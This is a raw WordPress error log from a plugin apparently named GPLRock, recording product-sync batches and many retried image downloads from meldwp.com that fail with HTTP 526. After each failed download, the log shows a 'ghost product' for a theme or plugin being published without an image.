UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: radio-player-with-playlist-shoutcast-and-icecast [08-Mar-2026 22:25:43 UTC] GPLRock: Image download failed for product wordpress-widgets-in-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:45 UTC] GPLRock: Image download failed for product wordpress-widgets-in-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-widgets-in-wpbakery-page-builder-30601.webp for product wordpress-widgets-in-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:25:48 UTC] GPLRock: Image download failed for product wordpress-widgets-in-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:50 UTC] GPLRock: Image download failed for product wordpress-widgets-in-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-widgets-in-wpbakery-page-builder-30601.webp for product wordpress-widgets-in-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:25:52 UTC] GPLRock WARNING: Image download failed for product wordpress-widgets-in-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/wordpress-widgets-in-wpbakery-page-builder-30601.webp [08-Mar-2026 22:25:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-widgets-in-wpbakery-page-builder [08-Mar-2026 22:25:52 UTC] GPLRock: Image download failed for product google-maps-with-multiple-markers-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:54 UTC] GPLRock: Image download failed for product google-maps-with-multiple-markers-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/google-maps-with-multiple-markers-addon-for-wpbakery-page-builder-11735.webp for product google-maps-with-multiple-markers-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:25:56 UTC] GPLRock: Image download failed for product google-maps-with-multiple-markers-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:58 UTC] GPLRock: Image download failed for product google-maps-with-multiple-markers-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/google-maps-with-multiple-markers-addon-for-wpbakery-page-builder-11735.webp for product google-maps-with-multiple-markers-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:26:00 UTC] GPLRock WARNING: Image download failed for product google-maps-with-multiple-markers-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/google-maps-with-multiple-markers-addon-for-wpbakery-page-builder-11735.webp [08-Mar-2026 22:26:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: google-maps-with-multiple-markers-addon-for-wpbakery-page-builder [08-Mar-2026 22:26:01 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1900, Total: 300/9737 [08-Mar-2026 22:26:02 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:26:06 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 22:26:06 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2000, Total: 300/9737 [08-Mar-2026 22:26:07 UTC] GPLRock: Image download failed for product wp-guard-wordpress-security-firewall-anti-spam (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:07 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:26:09 UTC] GPLRock: Image download failed for product wp-guard-wordpress-security-firewall-anti-spam (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:10 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:26:10 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 22:26:10 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2100, Total: 400/9737 [08-Mar-2026 22:26:11 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:26:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-guard---wordpress-security-firewall--anti-spam-18973.webp for product wp-guard-wordpress-security-firewall-anti-spam after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:26:11 UTC] GPLRock: Image download failed for product wp-guard-wordpress-security-firewall-anti-spam (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:11 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:26:13 UTC] GPLRock: Image download failed for product wp-guard-wordpress-security-firewall-anti-spam (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-guard---wordpress-security-firewall--anti-spam-18973.webp for product wp-guard-wordpress-security-firewall-anti-spam after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:26:16 UTC] GPLRock WARNING: Image download failed for product wp-guard-wordpress-security-firewall-anti-spam. URL: https://meldwp.com/wp-content/uploads/wp-guard---wordpress-security-firewall--anti-spam-18973.webp [08-Mar-2026 22:26:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-guard-wordpress-security-firewall-anti-spam [08-Mar-2026 22:26:16 UTC] GPLRock: Image download failed for product woocommerce-shipping-method-conditions-priorities (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:18 UTC] GPLRock: Image download failed for product woocommerce-shipping-method-conditions-priorities (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-shipping-method-conditions--priorities-9438.webp for product woocommerce-shipping-method-conditions-priorities after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:26:20 UTC] GPLRock: Image download failed for product woocommerce-shipping-method-conditions-priorities (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:22 UTC] GPLRock: Image download failed for product woocommerce-shipping-method-conditions-priorities (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-shipping-method-conditions--priorities-9438.webp for product woocommerce-shipping-method-conditions-priorities after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:26:24 UTC] GPLRock WARNING: Image download failed for product woocommerce-shipping-method-conditions-priorities. URL: https://meldwp.com/wp-content/uploads/woocommerce-shipping-method-conditions--priorities-9438.webp [08-Mar-2026 22:26:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-shipping-method-conditions-priorities [08-Mar-2026 22:26:24 UTC] GPLRock: Image download failed for product mingle-saas-social-auto-poster-scheduler-php-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:26 UTC] GPLRock: Image download failed for product mingle-saas-social-auto-poster-scheduler-php-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mingle-saas---social-auto-poster--scheduler-php-script-27572.webp for product mingle-saas-social-auto-poster-scheduler-php-script after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:26:29 UTC] GPLRock: Image download failed for product mingle-saas-social-auto-poster-scheduler-php-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:31 UTC] GPLRock: Image download failed for product mingle-saas-social-auto-poster-scheduler-php-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mingle-saas---social-auto-poster--scheduler-php-script-27572.webp for product mingle-saas-social-auto-poster-scheduler-php-script after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:26:33 UTC] GPLRock WARNING: Image download failed for product mingle-saas-social-auto-poster-scheduler-php-script. URL: https://meldwp.com/wp-content/uploads/mingle-saas---social-auto-poster--scheduler-php-script-27572.webp [08-Mar-2026 22:26:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mingle-saas-social-auto-poster-scheduler-php-script [08-Mar-2026 22:26:33 UTC] GPLRock: Image download failed for product emo-reactions-pro-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:35 UTC] GPLRock: Image download failed for product emo-reactions-pro-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emo-reactions-pro---wordpress-plugin-280.webp for product emo-reactions-pro-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:26:38 UTC] GPLRock: Image download failed for product emo-reactions-pro-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:40 UTC] GPLRock: Image download failed for product emo-reactions-pro-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emo-reactions-pro---wordpress-plugin-280.webp for product emo-reactions-pro-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:26:42 UTC] GPLRock WARNING: Image download failed for product emo-reactions-pro-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/emo-reactions-pro---wordpress-plugin-280.webp [08-Mar-2026 22:26:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: emo-reactions-pro-wordpress-plugin [08-Mar-2026 22:26:42 UTC] GPLRock: Image download failed for product musik-wordpress-admin-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:44 UTC] GPLRock: Image download failed for product musik-wordpress-admin-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/musik---wordpress-admin-theme-4562.webp for product musik-wordpress-admin-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:26:47 UTC] GPLRock: Image download failed for product musik-wordpress-admin-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:49 UTC] GPLRock: Image download failed for product musik-wordpress-admin-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/musik---wordpress-admin-theme-4562.webp for product musik-wordpress-admin-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:26:51 UTC] GPLRock WARNING: Image download failed for product musik-wordpress-admin-theme. URL: https://meldwp.com/wp-content/uploads/musik---wordpress-admin-theme-4562.webp [08-Mar-2026 22:26:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: musik-wordpress-admin-theme [08-Mar-2026 22:26:51 UTC] GPLRock: Image download failed for product wpbakery-youtube-channel-with-carousel-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:53 UTC] GPLRock: Image download failed for product wpbakery-youtube-channel-with-carousel-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-youtube-channel-with-carousel-addon-16422.webp for product wpbakery-youtube-channel-with-carousel-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:26:55 UTC] GPLRock: Image download failed for product wpbakery-youtube-channel-with-carousel-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:26:57 UTC] GPLRock: Image download failed for product wpbakery-youtube-channel-with-carousel-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-youtube-channel-with-carousel-addon-16422.webp for product wpbakery-youtube-channel-with-carousel-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:27:00 UTC] GPLRock WARNING: Image download failed for product wpbakery-youtube-channel-with-carousel-addon. URL: https://meldwp.com/wp-content/uploads/wpbakery-youtube-channel-with-carousel-addon-16422.webp [08-Mar-2026 22:27:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbakery-youtube-channel-with-carousel-addon [08-Mar-2026 22:27:02 UTC] GPLRock: Image download failed for product taqyeem-predefined-criteria-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:04 UTC] GPLRock: Image download failed for product taqyeem-predefined-criteria-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/taqyeem---predefined-criteria-addon-20923.webp for product taqyeem-predefined-criteria-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:27:06 UTC] GPLRock: Image download failed for product taqyeem-predefined-criteria-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:08 UTC] GPLRock: Image download failed for product taqyeem-predefined-criteria-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/taqyeem---predefined-criteria-addon-20923.webp for product taqyeem-predefined-criteria-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:27:11 UTC] GPLRock WARNING: Image download failed for product taqyeem-predefined-criteria-addon. URL: https://meldwp.com/wp-content/uploads/taqyeem---predefined-criteria-addon-20923.webp [08-Mar-2026 22:27:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: taqyeem-predefined-criteria-addon [08-Mar-2026 22:27:11 UTC] GPLRock: Image download failed for product tmusers-bbpress-forum-member-directory-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:13 UTC] GPLRock: Image download failed for product tmusers-bbpress-forum-member-directory-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tmusers---bbpress-forum-member-directory-for-elementor-8104.webp for product tmusers-bbpress-forum-member-directory-for-elementor after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:27:15 UTC] GPLRock: Image download failed for product tmusers-bbpress-forum-member-directory-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:17 UTC] GPLRock: Image download failed for product tmusers-bbpress-forum-member-directory-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tmusers---bbpress-forum-member-directory-for-elementor-8104.webp for product tmusers-bbpress-forum-member-directory-for-elementor after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:27:19 UTC] GPLRock WARNING: Image download failed for product tmusers-bbpress-forum-member-directory-for-elementor. URL: https://meldwp.com/wp-content/uploads/tmusers---bbpress-forum-member-directory-for-elementor-8104.webp [08-Mar-2026 22:27:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tmusers-bbpress-forum-member-directory-for-elementor [08-Mar-2026 22:27:19 UTC] GPLRock: Image downloaded successfully for product team-grid-team-member-showcase-wordpress-plugin-team-editor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b53f1bd4.webp [08-Mar-2026 22:27:19 UTC] GPLRock: Using pre-downloaded image for product team-grid-team-member-showcase-wordpress-plugin-team-editor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b53f1bd4.webp [08-Mar-2026 22:27:19 UTC] GPLRock: Ghost product published with image - Product ID: team-grid-team-member-showcase-wordpress-plugin-team-editor [08-Mar-2026 22:27:19 UTC] GPLRock: Image downloaded successfully for product eshop-web-multi-vendor-ecommerce-marketplace-cms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1a61574f.webp [08-Mar-2026 22:27:19 UTC] GPLRock: Using pre-downloaded image for product eshop-web-multi-vendor-ecommerce-marketplace-cms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1a61574f.webp [08-Mar-2026 22:27:19 UTC] GPLRock: Ghost product published with image - Product ID: eshop-web-multi-vendor-ecommerce-marketplace-cms [08-Mar-2026 22:27:20 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2000, Total: 300/9737 [08-Mar-2026 22:27:21 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:27:23 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 22:27:24 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2100, Total: 300/9737 [08-Mar-2026 22:27:24 UTC] GPLRock: Image download failed for product nouhotel-resort-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:25 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:27:27 UTC] GPLRock: Image download failed for product nouhotel-resort-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:27 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 22:27:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nouhotel---resort--hotel-booking-wordpress-theme-20507.webp for product nouhotel-resort-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:27:29 UTC] GPLRock: Image download failed for product nouhotel-resort-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:31 UTC] GPLRock: Image download failed for product nouhotel-resort-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nouhotel---resort--hotel-booking-wordpress-theme-20507.webp for product nouhotel-resort-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:27:33 UTC] GPLRock WARNING: Image download failed for product nouhotel-resort-hotel-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nouhotel---resort--hotel-booking-wordpress-theme-20507.webp [08-Mar-2026 22:27:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nouhotel-resort-hotel-booking-wordpress-theme [08-Mar-2026 22:27:35 UTC] GPLRock: Image download failed for product fargo-a-charming-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:37 UTC] GPLRock: Image download failed for product fargo-a-charming-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fargo--a-charming-photography-wordpress-theme-15451.webp for product fargo-a-charming-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:27:39 UTC] GPLRock: Image download failed for product fargo-a-charming-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:41 UTC] GPLRock: Image download failed for product fargo-a-charming-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fargo--a-charming-photography-wordpress-theme-15451.webp for product fargo-a-charming-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:27:43 UTC] GPLRock WARNING: Image download failed for product fargo-a-charming-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fargo--a-charming-photography-wordpress-theme-15451.webp [08-Mar-2026 22:27:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fargo-a-charming-photography-wordpress-theme [08-Mar-2026 22:27:44 UTC] GPLRock: Image download failed for product travelpro-adventure-tours-and-travel-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:46 UTC] GPLRock: Image download failed for product travelpro-adventure-tours-and-travel-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travelpro---adventure-tours-and-travel-agency-wordpress-theme-18503.webp for product travelpro-adventure-tours-and-travel-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:27:48 UTC] GPLRock: Image download failed for product travelpro-adventure-tours-and-travel-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:50 UTC] GPLRock: Image download failed for product travelpro-adventure-tours-and-travel-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travelpro---adventure-tours-and-travel-agency-wordpress-theme-18503.webp for product travelpro-adventure-tours-and-travel-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:27:52 UTC] GPLRock WARNING: Image download failed for product travelpro-adventure-tours-and-travel-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/travelpro---adventure-tours-and-travel-agency-wordpress-theme-18503.webp [08-Mar-2026 22:27:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: travelpro-adventure-tours-and-travel-agency-wordpress-theme [08-Mar-2026 22:27:52 UTC] GPLRock: Image download failed for product electech-electronics-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:54 UTC] GPLRock: Image download failed for product electech-electronics-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:27:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/electech---electronics-store-woocommerce-wordpress-theme-28555.webp for product electech-electronics-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:27:58 UTC] GPLRock: Image download failed for product electech-electronics-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:00 UTC] GPLRock: Image download failed for product electech-electronics-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/electech---electronics-store-woocommerce-wordpress-theme-28555.webp for product electech-electronics-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:28:02 UTC] GPLRock WARNING: Image download failed for product electech-electronics-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/electech---electronics-store-woocommerce-wordpress-theme-28555.webp [08-Mar-2026 22:28:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: electech-electronics-store-woocommerce-wordpress-theme [08-Mar-2026 22:28:03 UTC] GPLRock: Image downloaded successfully for product canvas-interior-and-furniture-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d85bc60d.webp [08-Mar-2026 22:28:03 UTC] GPLRock: Using pre-downloaded image for product canvas-interior-and-furniture-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d85bc60d.webp [08-Mar-2026 22:28:03 UTC] GPLRock: Ghost product published with image - Product ID: canvas-interior-and-furniture-agency-wordpress-theme [08-Mar-2026 22:28:03 UTC] GPLRock: Image download failed for product qoxag-wordpress-news-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:05 UTC] GPLRock: Image download failed for product qoxag-wordpress-news-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qoxag---wordpress-news-magazine-theme-8596.webp for product qoxag-wordpress-news-magazine-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:28:07 UTC] GPLRock: Image download failed for product qoxag-wordpress-news-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:10 UTC] GPLRock: Image download failed for product qoxag-wordpress-news-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qoxag---wordpress-news-magazine-theme-8596.webp for product qoxag-wordpress-news-magazine-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:28:12 UTC] GPLRock WARNING: Image download failed for product qoxag-wordpress-news-magazine-theme. URL: https://meldwp.com/wp-content/uploads/qoxag---wordpress-news-magazine-theme-8596.webp [08-Mar-2026 22:28:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: qoxag-wordpress-news-magazine-theme [08-Mar-2026 22:28:12 UTC] GPLRock: Image download failed for product shoperific-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:14 UTC] GPLRock: Image download failed for product shoperific-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shoperific---woocommerce-wordpress-theme-7828.webp for product shoperific-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:28:17 UTC] GPLRock: Image download failed for product shoperific-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:19 UTC] GPLRock: Image download failed for product shoperific-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shoperific---woocommerce-wordpress-theme-7828.webp for product shoperific-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:28:21 UTC] GPLRock WARNING: Image download failed for product shoperific-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/shoperific---woocommerce-wordpress-theme-7828.webp [08-Mar-2026 22:28:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shoperific-woocommerce-wordpress-theme [08-Mar-2026 22:28:22 UTC] GPLRock: Image download failed for product petio-pet-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:24 UTC] GPLRock: Image download failed for product petio-pet-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/petio--pet-store-woocommerce-wordpress-theme-9412.webp for product petio-pet-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:28:26 UTC] GPLRock: Image download failed for product petio-pet-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:28 UTC] GPLRock: Image download failed for product petio-pet-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/petio--pet-store-woocommerce-wordpress-theme-9412.webp for product petio-pet-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:28:30 UTC] GPLRock WARNING: Image download failed for product petio-pet-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/petio--pet-store-woocommerce-wordpress-theme-9412.webp [08-Mar-2026 22:28:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: petio-pet-store-woocommerce-wordpress-theme [08-Mar-2026 22:28:31 UTC] GPLRock: Image download failed for product foodsy-wordpress-food-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:33 UTC] GPLRock: Image download failed for product foodsy-wordpress-food-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodsy---wordpress-food-blog-theme-31553.webp for product foodsy-wordpress-food-blog-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:28:35 UTC] GPLRock: Image download failed for product foodsy-wordpress-food-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:37 UTC] 